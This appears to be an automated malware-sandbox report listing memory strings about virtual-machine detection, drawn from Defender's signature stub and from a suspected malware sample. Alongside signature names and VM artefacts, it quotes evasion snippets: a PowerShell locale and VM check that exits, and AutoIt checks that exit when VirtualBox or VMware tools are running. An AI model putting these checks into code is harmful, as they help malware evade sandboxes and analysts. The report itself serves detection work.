Source: MpSigStub.exe, 00000026.00000003.18305766772.00000138BD36A000.00000004.00000001.sdmp	Binary or memory string: !#RANSMATTR:PeLodDynDetVmwarepea_isexe&(pea_dt_error_heur_exit_criteria\|pea_dt_error_heur_API_limit\|pea_dt_error_bb_limit)&pea_dynmem_detects_vmware
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	Binary or memory string: vmtools.exe
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: 83*\|%systemroot%\System32\Vmwp.exe\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.img.\|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: .VMCX.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.xml.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: &!*.txt.\|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: vboxservice
Source: MpSigStub.exe, 00000026.00000003.18268996153.00000138AEB7A000.00000004.00000001.sdmp	Binary or memory string: PSF1.00123456789ABCDEF0123456789abcdefpea_epscn_islastpea_epcallnextpea_secmissizepea_epatstartlastsectpea_entrybyte60pea_entrybyte90pea_epiniatpea_usesuninitializedregspea_prefetchtrickspea_issuspiciouspea_isgenericpea_isreportedpea_aggressiveimportpea_deep_analysispea_enable_binlibpea_enable_lshashpea_many_importspea_self_modifying_codepea_track_direct_importspea_detects_vmpea_detects_vmwarepea_detects_virtualpcpea_is_delphipea_is_processpea_disable_apicall_limitpea_kernel_scanpea_uses_single_steppingpea_uses_breakpointspea_uses_privinstrpea_uses_bound_exceptionspea_uses_div_by_zeropea_uses_int_overflowpea_uses_invalid_opcodespea_uses_access_violationpea_uses_unusual_breakpointpea_checks_if_debugged_documentedpea_disable_io_redirectionpea_suspicious_rebasepea_disable_drop_mz_onlypea_suspicious_stack_sizepea_suspicious_stack_geometrypea_suspicious_subsystempea_suspicious_timestamppea_suspicious_valignpea_suspicious_section_fsizepea_suspicious_section_vsizepea_suspicious_section_namepea_suspicious_section_characteristicspea_aggressive_trim_wspea_16bitmachinepea_system_filepea_byte_reversed_hipea_suspicious_number_of_dirspea_force_unpackingpea_extended_pestaticpea_small_data_directory_countpea_multiple_relocs_same_locationpea_relocs_but_no_relocs_flagpea_suspicious_imagebasepea_no_section_tablepea_no_sectionspea_many_sectionspea_suspicious_image_sizepea_bound_imports_inside_imagepea_delay_load_imports_inside_imagepea_entrypoint_in_import_tablepea_entrypoint_in_headerpea_import_via_tlspea_epsec_not_executablepea_othermachine_imagepea_checks_teb_lasterrorpea_disable_vmprotectpea_checks_teb_laststatuspea_disable_thread_apicall_limitpea_deep_apicall_limitpea_genpackedpea_dynmem_uses_div_by_zeropea_dynmem_uses_int_overflowpea_dynmem_uses_bound_exceptionspea_dynmem_uses_privinstrpea_dynmem_uses_breakpointspea_dynmem_uses_single_steppingpea_dynmem_uses_invalid_opcodespea_dynmem_uses_access_violationpea_dynmem_uses_unusual_breakpointpea_dynmem_detects_vmpea_dynmem_detects_vmwarepea_dynmem_detects_virtualpcpea_dynmem_checks_if_debugged_docpea_dynmem_checks_if_debugged_undocpea_dynmem_kernel_scanpea_dynmem_self_modifying_codepea_dt_continue_after_unpackingpea_dt_continue_after_unpacking_damagedpea_loop_jmp_chainpea_droppedpea_dynmem_reads_vdll_codepea_verbose_vdll_readspea_scan_internal_datapea_isvbpcodepea_ARM_legacypea_ARM_big_endianpea_ARM_unpredictablepea_isappcontainerpea_checks_ntglobalflagpea_dynmem_checks_ntglobalflagpea_dynmem_checks_processheappea_dt_error_too_many_prefixespea_dt_error_too_many_operandspea_dt_error_bb_limitpea_executes_from_last_sectionpea_executes_from_resourcespea_memory_patchedpea_uses_sysenterpea_suspicious_resource_directory_sizepea_suspicious_import_directory_sizepea_invalid_ilt_entrypea_dmg_machinepea_dmg_filealignmentpea_dmg_pointertorawdatapea_dmg_virtualaddresspea_dmg_truncatedpea_dmg_special_sectionpea_dmg_relocationspea_dmg_overlapping_sectionspea_dmg_optional_magicpea_dmg_sizeofheaderspea_dmg_imagebasepea_dmg_imagesiz
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: % *.xml.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	Binary or memory string: f)a.VmDetector.VirtualMachineDetector
Source: MpSigStub.exe, 00000026.00000003.18296056460.00000138BE07F000.00000004.00000001.sdmp	Binary or memory string: unsubscribe vmnet notification
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	Binary or memory string: \\.\VBoxMiniRdrDN
Source: ieinstal.exe, 0000000D.00000002.19666460242.00000000031C9000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.xml.\|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: Anti Sandboxie/VMware
Source: AZTEKERNES.exe, 00000005.00000002.15127289168.0000000002BD0000.00000004.00000001.sdmp, ieinstal.exe, 0000000D.00000002.19665461719.0000000003080000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: 83*\|%systemroot%\System32\Vmms.exe\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	Binary or memory string: myapp.exeqemu
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: AntiVmWare
Source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp	Binary or memory string: FA*.\|!%ProgramFiles%\Android\Android Studio\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: % *.img.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000026.00000003.18301521899.00000138BE774000.00000004.00000001.sdmp	Binary or memory string: sandboxvmware]
Source: ieinstal.exe, 0000000D.00000002.19668777561.0000000004A79000.00000004.00000001.sdmp	Binary or memory string: vmicshutdown
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: .ISO.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp	Binary or memory string: *.\|!%ProgramFiles(x86)%\Android\Android Studio\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	Binary or memory string: Global\VBoxService.exe
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: ZU%SystemDrive%\ProgramData\Microsoft\Windows\Hyper-V\Snapshots\.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.bin.\|!\qemu-system-armel.exe
Source: MpSigStub.exe, 00000026.00000003.18268996153.00000138AEB7A000.00000004.00000001.sdmp	Binary or memory string: VMwareVMware
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: vboxmrxnp.dll
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.txt.\|!\qemu-system-i386.exe
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: .VSV.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: *\|%systemroot%\System32\Vmms.exe\|Microsoft-Hyper-V
Source: AZTEKERNES.exe, 00000005.00000002.15128441575.0000000002D39000.00000004.00000001.sdmp, ieinstal.exe, 0000000D.00000002.19668777561.0000000004A79000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA
Source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp	Binary or memory string: %vmware
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: 3.%ProgramFiles%\Hyper-V\.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	Binary or memory string: if(((get-uiculture).name-match"ru\|ua\|by\|cn")-or((get-wmiobject-classwin32_computersystem-propertymodel).model-match"virtualbox\|vmware\|kvm")){exit;}
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: &!*.xml.\|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: vmGuestLib.dll
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	Binary or memory string: vmware.exe\|
Source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp	Binary or memory string: !#RANSMATTR:PeLodDetVmWarepea_isexe&(pea_dt_error_heur_exit_criteria\|pea_dt_error_heur_API_limit\|pea_dt_error_bb_limit)&pea_detects_vmware
Source: MpSigStub.exe, 00000026.00000003.18338362697.00000138BCE4E000.00000004.00000001.sdmp	Binary or memory string: 8mus=mud_muramuyamuebmufbmuhbmu_emuiemuqemuimmujnmuhomubrmufrmu]tmuevmucwmucymu
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	Binary or memory string: vmware-authd.exe
Source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp	Binary or memory string: *.log.\|!\Veeam.One.Collector.VMware.Host.exe
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.rom.\|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.txt.\|!\qemu-system-aarch64.exe
Source: AZTEKERNES.exe, 00000005.00000002.15128441575.0000000002D39000.00000004.00000001.sdmp, ieinstal.exe, 0000000D.00000002.19668777561.0000000004A79000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.img.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: *.BIN.\|%SYSTEMPROCESS%\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	Binary or memory string: qemuvirtualvmware\\.\PhysicalDrive0
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	Binary or memory string: VMWare
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.toc.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000026.00000003.18348616803.00000138BCC0C000.00000004.00000001.sdmp	Binary or memory string: vmwareservice.exe
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: >Host: virtualmachine-update.com
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: .vhds.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: &!*.rom.\|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000026.00000003.18268996153.00000138AEB7A000.00000004.00000001.sdmp	Binary or memory string: detects_vmware
Source: MpSigStub.exe, 00000026.00000003.18305766772.00000138BD36A000.00000004.00000001.sdmp	Binary or memory string: C:\WINDOWS\SYSTEM32\VMBUSRES.DLL>C:\WINDOWS\SYSTEM32\UNKNOWNDLL.DLL
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: *.BIN.\|%systemroot%\System32\Vmwp.exe\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: Systeminfo \| findstr /i modelExecToStackVirtualBoxVirtual MachineVMware
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: .)*.BIN.\|%SYSTEMPROCESS%\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	Binary or memory string: VBoxService
Source: MpSigStub.exe, 00000026.00000003.18268996153.00000138AEB7A000.00000004.00000001.sdmp	Binary or memory string: pea_detects_vmware
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: % *.rom.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000026.00000003.18345142336.00000138BCDE5000.00000004.00000001.sdmp	Binary or memory string: aplicativos.netlhe.com/vmnetdhcp/
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: % *.toc.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: .vhdpmem.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: idKasperkyVPCVMWareSandboxieHiJackThisgetDevicesRC4
Source: AZTEKERNES.exe, 00000005.00000002.15127289168.0000000002BD0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeuser32psapi.dllMsi.dllPublishershell32advapi32TEMP=ProgramFiles=\internet explorer\ieinstal.exewindir=\syswow64\msvbvm60.dll
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	Binary or memory string: \\vmware-host:Y
Source: MpSigStub.exe, 00000026.00000003.18298692792.00000138BDFE8000.00000004.00000001.sdmp	Binary or memory string: Vmware
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: azurevirtualmachinename_scrubbed
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	Binary or memory string: VBoxTray.exe
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	Binary or memory string: vmtoolsx7
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: .VHD.\|\|Microsoft-Hyper-V
Source: ieinstal.exe, 0000000D.00000002.19668777561.0000000004A79000.00000004.00000001.sdmp	Binary or memory string: vmicheartbeat
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: &!*.bin.\|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: &!*.img.\|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	Binary or memory string: VBoxTray
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: .VHDX.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp	Binary or memory string: vmtoolsd.exe
Source: AZTEKERNES.exe, 00000005.00000002.15128441575.0000000002D39000.00000004.00000001.sdmp, ieinstal.exe, 0000000D.00000002.19668777561.0000000004A79000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.img.\|!\qemu-system-i386.exe
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	Binary or memory string: DetectVirtualMachine
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	Binary or memory string: HARDWARE\ACPI\RSDT\VBOX__
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.xml.\|!\qemu-system-i386.exe
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.xml.\|!\qemu-system-armel.exe
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: (AntiVirtualPCAntiVirtualBoxAntiVmWare]
Source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp	Binary or memory string: Ven_VMware_
Source: MpSigStub.exe, 00000026.00000003.18344712542.00000138BD9CA000.00000004.00000001.sdmp	Binary or memory string: VmWareMachine
Source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp	Binary or memory string: +system\currentcontrolset\services\vboxguest
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: JE%Public%\Documents\Hyper-V\Virtual Hard Disks\.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: %SystemDrive%\ProgramData\Microsoft\Windows\Hyper-V\Snapshots\.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.txt.\|!\qemu-system-armel.exe
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: AZTEKERNES.exe, 00000005.00000002.15128441575.0000000002D39000.00000004.00000001.sdmp, ieinstal.exe, 0000000D.00000002.19668777561.0000000004A79000.00000004.00000001.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp	Binary or memory string: 2-*.log.\|!\Veeam.One.Collector.VMware.Host.exe
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: D?%ProgramData%\Microsoft\Windows\Hyper-V\.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	Binary or memory string: vmtoolsd
Source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp	Binary or memory string: *.\|!%ProgramFiles%\Android\Android Studio\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	Binary or memory string: HSTR:Detects_VirtualPC_VMWare
Source: MpSigStub.exe, 00000026.00000003.18268996153.00000138AEB7A000.00000004.00000001.sdmp	Binary or memory string: pea_dynmem_detects_vmware
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: .VMRS.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	Binary or memory string: VboxService.exe
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.txt.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: 83*\|%systemroot%\System32\Vmsp.exe\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	Binary or memory string: pUnix file descriptiontargetjob\\vmware-host:Y DomainBigSpace resultiitem]
Source: AZTEKERNES.exe, 00000005.00000002.15128441575.0000000002D39000.00000004.00000001.sdmp, ieinstal.exe, 0000000D.00000002.19668777561.0000000004A79000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: MpSigStub.exe, 00000026.00000003.18347020004.00000138BDD25000.00000004.00000001.sdmp	Binary or memory string: virtual hd
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	Binary or memory string: =mQ:#LowFiDetectsVmWareU
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	Binary or memory string: ifprocessexists("vboxtray.exe")and$
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	Binary or memory string: vmware svga ii
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	Binary or memory string: qemu-ga.exe
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	Binary or memory string: ifprocessexists("vmwaretray.exe")thenexit
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	Binary or memory string: VMWARE": IsVirtualPCPresent
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: *\|%systemroot%\System32\Vmcompute.exe\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: .vmgs.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18348616803.00000138BCC0C000.00000004.00000001.sdmp	Binary or memory string: IsVmWare]
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.rom.\|!\qemu-system-armel.exe
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: *\|%systemroot%\System32\Vmsp.exe\|Microsoft-Hyper-V
Source: ieinstal.exe, 0000000D.00000002.19668777561.0000000004A79000.00000004.00000001.sdmp	Binary or memory string: vmicvss
Source: MpSigStub.exe, 00000026.00000003.18252515965.00000138ADB0C000.00000004.00000001.sdmp	Binary or memory string: 0123456789ABCDEF0123456789abcdef\Device\\SystemRootcoroutinenewproxyLua 5.1_VERSIONpairsipairs__modekv_Gcreateresumerunningstatuswrapyieldpea_epscn_islastpea_epcallnextpea_secmissizepea_epatstartlastsectpea_entrybyte60pea_entrybyte90pea_epiniatpea_usesuninitializedregspea_prefetchtrickspea_issuspiciouspea_isgenericpea_isreportedpea_aggressiveimportpea_deep_analysispea_enable_binlibpea_enable_lshashpea_many_importspea_self_modifying_codepea_track_direct_importspea_detects_vmpea_detects_vmwarepea_detects_virtualpcpea_is_delphipea_is_processpea_uses_single_steppingpea_uses_bound_exceptionspea_uses_div_by_zeropea_uses_int_overflowpea_uses_invalid_opcodespea_uses_unusual_breakpointpea_checks_if_debugged_documentedpea_disable_io_redirectionpea_suspicious_rebasepea_disable_drop_mz_onlypea_suspicious_stack_sizepea_suspicious_stack_geometrypea_suspicious_subsystempea_suspicious_timestamppea_suspicious_valignpea_suspicious_section_fsizepea_suspicious_section_namepea_suspicious_section_characteristicspea_aggressive_trim_wspea_16bitmachinepea_system_filepea_byte_reversed_hipea_suspicious_number_of_dirspea_force_unpackingpea_extended_pestaticpea_small_data_directory_countpea_multiple_relocs_same_locationpea_relocs_but_no_relocs_flagpea_suspicious_imagebasepea_no_section_tablepea_no_sectionspea_many_sectionspea_suspicious_image_sizepea_bound_imports_inside_imagepea_delay_load_imports_inside_imagepea_entrypoint_in_import_tablepea_entrypoint_in_headerpea_import_via_tlspea_epsec_not_executablepea_othermachine_imagepea_checks_teb_lasterrorpea_disable_vmprotectpea_checks_teb_laststatuspea_disable_thread_apicall_limitpea_deep_apicall_limitpea_dynmem_uses_div_by_zeropea_dynmem_uses_int_overflowpea_dynmem_uses_bound_exceptionspea_dynmem_uses_privinstrpea_dynmem_uses_breakpointspea_dynmem_uses_single_steppingpea_dynmem_uses_invalid_opcodespea_dynmem_uses_unusual_breakpointpea_dynmem_detects_vmpea_dynmem_detects_vmwarepea_dynmem_detects_virtualpcpea_dynmem_checks_if_debugged_docpea_dynmem_checks_if_debugged_undocpea_dynmem_kernel_scanpea_dynmem_self_modifying_codepea_dt_continue_after_unpackingpea_dt_continue_after_unpacking_damagedpea_loop_jmp_chainpea_droppedpea_dynmem_reads_vdll_codepea_verbose_vdll_readspea_scan_internal_datapea_isvbpcodepea_ARM_legacypea_ARM_big_endianpea_ARM_unpredictablepea_isappcontainerpea_checks_ntglobalflagpea_dynmem_checks_ntglobalflagpea_dynmem_checks_processheappea_dt_error_too_many_prefixespea_dt_error_too_many_operandspea_dt_error_bb_limitpea_executes_from_last_sectionpea_executes_from_resourcespea_memory_patchedpea_uses_sysenterpea_suspicious_resource_directory_sizepea_suspicious_import_directory_sizepea_invalid_ilt_entrypea_dmg_machinepea_dmg_filealignmentpea_dmg_pointertorawdatapea_dmg_virtualaddresspea_dmg_truncatedpea_dmg_special_sectionpea_dmg_relocationspea_dmg_overlapping_sectionspea_dmg_optional_magicpea_dmg_sizeofheaderspea_dmg_imagebasepea_dmg_imagesizepea_dmg_unsupportedpea_dmg_importspea_dmg_invaliddatapea_dmg_decompresspea_
Source: AZTEKERNES.exe, 00000005.00000002.15128441575.0000000002D39000.00000004.00000001.sdmp, ieinstal.exe, 0000000D.00000002.19668777561.0000000004A79000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.toc.\|!\qemu-system-i386.exe
Source: ieinstal.exe, 0000000D.00000002.19667070174.00000000031FF000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW7
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: %Public%\Documents\Hyper-V\Virtual Hard Disks\.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	Binary or memory string: qemu
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	Binary or memory string: http://pubs.vmware.com
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	Binary or memory string: SCSIDISKxxvmboxxxharddiskVMware
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	Binary or memory string: +ifprocessexists("vmwaretray.exe")thenexit
Source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp	Binary or memory string: VirtualMachineDetector
Source: MpSigStub.exe, 00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp	Binary or memory string: ,ifprocessexists("vboxservice.exe")thenexit
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: % *.txt.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	Binary or memory string: ".VmDetector.VirtualMachineDetector
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	Binary or memory string: ifstringregexp($oobjectitem.name,"(?i)virtualbox\|vmware\|virtualpc\|sandbox\|333333\|home-off-d5f0ac\|microsof-2c393f\|123\|vwinxp-maltest")thenreturn1
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	Binary or memory string: 3svmcibex9
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	Binary or memory string: VMware Physical Disk Helper Service
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: &!*.toc.\|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp	Binary or memory string: __tbt_isVirtualMachine
Source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp	Binary or memory string: VBoxService.exe
